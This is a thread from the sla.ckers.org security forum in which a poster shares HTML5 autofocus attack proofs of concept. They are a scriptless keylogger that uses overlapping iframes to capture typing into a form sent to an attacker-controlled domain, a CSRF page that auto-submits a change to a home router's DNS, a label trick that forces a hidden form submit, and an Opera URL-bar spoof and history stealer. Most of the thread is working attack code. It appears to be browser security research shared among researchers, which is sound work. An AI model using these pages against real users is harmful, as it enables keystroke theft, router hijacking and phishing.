Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
HTML 5 Scripting
Posted by: Skyphire
Date: April 28, 2010 12:15PM

HTML 5 Scripting - Without JavaScript.


Scriptless keylog primer PoC.

It still requires an ENTER/SPACE Key Event, But we might be able to bubble focus
through the FOR attribute to get even more flow control. Granted, this was
possible with JavaScript enabled before, but never without JavaScript since
there was no way to get focus from flow control from another domain, until now.
This is only an example of what autofocus can be capable of. I am sure more
elegant attacks are possible, given the time to think them up.


!!Legitform.html (on trusted domain)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="post" action="http://www.google.com">
<input type="text" name="log">
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Keylog.html (on untrusted domain)
<!doctype html>
<html>
  <head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="GET" action="http://www.scriptkiddie.universe.com">
<input type="text" name="log" autofocus> <!-- Due to autofocus, Frame F2 gets the focus. Even when it's below Frame F1! -->
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Test.html (on trusted domain, possibly injected/stored reflected XSS or
simply from unsanitized code)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>

<!-- This is only to watch what exactly happens, irl we set Frame F2 with a
fixed top position of about 19px/20px to let Frame F1 overlap Frame F2 -->
<iframe name="F1" src="legitform.html" style="position:absolute; top:18; 
left:90; z-index:3; height:25px; background-color:cyan;" scrolling="no">
</iframe>

<iframe name="F2" src="keylog.html" style="position:absolute; top:50; left:90;
z-index:2; height:25px; background-color:magenta;" scrolling="no">
</iframe>

</body>
</html>

-Skyphire.


Another PoC utilizes autofocus to bubble focus to the submit button on another
page, and thereby making a CSRF to change a home router DNS settings as
example, can be anything else malicious.

!! Test.html (on trusted server)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>CSRF example</title>
</head>
<body>

<!-- CSRF example injected portion through XSS/Unsanitized database -->

<iframe name="csrf" src="csrf.html"></iframe>

</body>
</html>

!! CSRF.html (on untrusted server)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Change router DNS settings</title>
</head>
<body>
<form name="logo" method="POST" action="http://192.168.1.2/">
<input type="text" name="log">
<input type="hidden" name="DNS" value="255.255.255.255">
<input type="submit" name="submit" value="submit" autofocus><!-- setting
autofocus on SUBMIT; Bad idea... -->
</form>
</body>
</html>

-Skyphire

Lest not forget:


<!-- bubble all flow control towards the button (including body clicks!) -->

<label for="submit">

  <body>

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque faucibus 
condimentum dui, nec suscipit nibh pulvinar quis. Mauris feugiat vulputate neque
 sed malesuada. Nam nec nibh id neque tristique fermentum. Maecenas dignissim mi
 nec libero ullamcorper sed imperdiet nisi vestibulum. Morbi iaculis risus id 
nulla pulvinar pharetra. Aenean a diam magna. Donec facilisis justo a velit 
malesuada dapibus. In sodales nisl a libero congue quis porttitor est malesuada.
 Duis pharetra, eros a eleifend porttitor, est risus aliquet justo, vitae auctor 
neque arcu et lacus. Etiam ornare magna sed nibh sagittis ut elementum lorem 
ultrices. Ut viverra interdum dictum. Vestibulum quis lorem et risus volutpat 
consequat eget a purus. Donec pharetra dictum suscipit. Cum sociis natoque 
penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam eget 
lectus mi, nec commodo nulla. Curabitur sed egestas quam. Phasellus dignissim 
purus ut sem fringilla ut ultrices magna auctor. Nam eu augue nibh. Morbi non 
augue nibh. 

   <form action="192.168.1.2/yourvulnrouter.html" method="post"><input type="submit" id="submit" style="display:none;"></form>

  </body>

</label>


So what else can we do? stealing files through FILE?
NO JS Allowed, since that's BORING! (; - btw. we really need a browser forum at sla.ckers, right, right? *puppy eyes*



Edited 1 time(s). Last edit at 04/28/2010 01:30PM by Skyphire.

Options: ReplyQuote
Re: HTML 5 Scripting
Posted by: Gareth Heyes
Date: April 28, 2010 12:42PM

Yeah browser forum would be good

also a sandbox forum!

*puppy eyes* also

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: HTML 5 Scripting
Posted by: Skyphire
Date: May 09, 2010 11:13PM

Got another one for Opera, but requires JS for now. Maybe it's possible to steal all history, not sure. Didn't find a quick solution for it yet. irl we would listen for a DOMFocusOut for example to trigger the fake URL bar.


<!doctype html>
<html>
  <head>
<meta charset="UTF-8">
<title>URLbar Spoof c.q. History stealer primer.</title>

<script>
	
	setInterval("bubble()",3);
	
		
		function bubble(v) {
			if(!v) { var v = document.getElementById('url').value; }
				if(v.indexOf(".")!=-1) {
					alert('Okay, so you went to '+v+' before? \r\n Let\'s go there again shall we.');
					document.location.href = v;
				}
		}


</script>

<style>
	
#url {
	width:200px;
	height:1px;
	position:absolute;
	top: -32px;
	left: 220px;
	font-size:99px;
	z-index:0;
	border:10px solid #fff;
}

</style>

</head>
<body>
    <h1>Type a letter right now. W, or S, or anything that resembles your history.</h1>
    then you will see a list, click one of your favourites!
    <form>
    <input name="url" type="url" id="url" value="" autofocus>
    </form>
</body>



Edited 1 time(s). Last edit at 05/13/2010 03:37AM by Skyphire.

Options: ReplyQuote


Sorry, only registered users may post in this forum.